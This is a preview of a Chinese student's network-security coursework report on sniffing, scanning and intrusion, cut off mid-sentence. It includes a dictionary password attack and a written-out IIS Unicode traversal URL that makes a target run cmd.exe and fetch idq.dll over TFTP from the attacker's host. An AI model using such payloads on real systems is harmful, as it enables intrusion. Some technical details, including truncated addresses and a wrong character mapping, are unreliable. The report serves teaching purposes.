文档详情

《网络安全技术》课程考查大作业 (7).docx

发布:2021-11-21约3.3千字共7页下载文档
文本预览下载声明
成绩评定: 大连外国语大学软件学院 成绩评定: 网络安全技术 专业: 信管 年级: 2013级 班级: 21班 姓名: 姜思远 学号: 31 黑客常用网络侦听、网络扫描、网络入侵方法简介 网络侦听: 目的是截获通信的内容,监听的手段是对协议进行分析。Sniffer pro就是一个网络监听工具。原理:在局域网中与其他计算机进行数据交换的时候,发送的数据包发往所有的连在一起的主机,也就是广播,在报头中包含目标机的正确地址。因此只有与数据包中目标地址一致的那台主机才会接收数据包,其他的机器都会将包丢弃。但是,当主机工作在监听模式下时,无论接收到的数据包中目标地址是什么,主机都将其接收下来。然后对数据包进行分析,就得到了局域网中通信的数据。一台计算机可以监听同一网段所有的数据包,不能监听不同网段的计算机传输的信息。 网络扫描: 一般分成两种: 主动式策略和被动式策略。 被动式策略就是基于主机之上,对系统中不合适的设置,脆弱的口令以及其他同安全规则抵触的对象进行检查。主动式策略是基于网络的,它通过执行一些脚本文件模拟对系统进行攻击的行为并记录系统的反应,从而发现其中的漏洞。 扫描的目的就是利用各种工具对攻击目标的IP地址或地址段的主机查找漏洞。扫描采取模拟攻击的形式对目标可能存在的已知安全漏洞逐项进行检查,目标可以是工作站、服务器、交换机、路由器和数据库应用等。根据扫描结果向扫描者或管理员提供周密可靠的分析报告。 网络入侵: 网络入侵手段:社会工程学攻击、物理攻击、暴力攻击、利用Unicode漏洞攻击、利用缓冲区溢出漏洞进行攻击等技术。 (1).社会工程学攻击:目前社会工程学攻击主要包括两种方式:打电话请求密码和伪造Email。 (2).物理攻击:物理安全是保护一些比较重要的设备不被接触。 物理安全比较难防,因为攻击往往来自能够接触到物理设备的用户。 (3).暴力攻击:一个黑客试图使用计算机和信息去破解一个密码。 一个黑客需要破解—段单一的被用非对称密钥加密的信息,为了破解这种算法,一个黑客需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息,即使拥有这种配备,它也将花掉八天的时间去破解加密算法,实际上破解加密过程八天已是非常短暂的时间了。 (4).利用Unicode漏洞攻击:原理:此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。 (5).利用缓冲区溢出漏洞进行攻击:当目标操作系统收到了超过了它的最大能接收的信息量的时候,将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出,然后覆盖了实际的程序数据,缓冲区溢出使目标系统的程序被修改,经过这种修改的结果使在系统上产生一个后门。 2. 第一种入侵方法 2.1方法原理 暴力破解操作系统密码:试图使用计算机和信息去破解一个密码。需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息 2.2 入侵过程 (1)利用要攻击的主机的ip地址,利用dict文字字典进行字典测试,利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示,扫描用户详细信息。 2.2 入侵结果 破解对方管理员密码,伪装成管理员身份进入系统。操作用户信息。 第二种入侵方法 3.1方法原理 unicode漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘ %c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘/‘。 3.2 入侵过程 (1)在本地计算机上搭建一个TFTP服务器,使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序 (2)通过该服务器向对方传递idq.dll文件。在浏览器中执行命令: 09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll (3)在scripts目录中上传了一个idq.dll文件,使用工具软件ispc.exe入侵对方系统。 (4)在DOS命令行下执行命令:“ispc.exe 09/scripts/idq.dll”,连接成功后进入对方的
显示全部
相似文档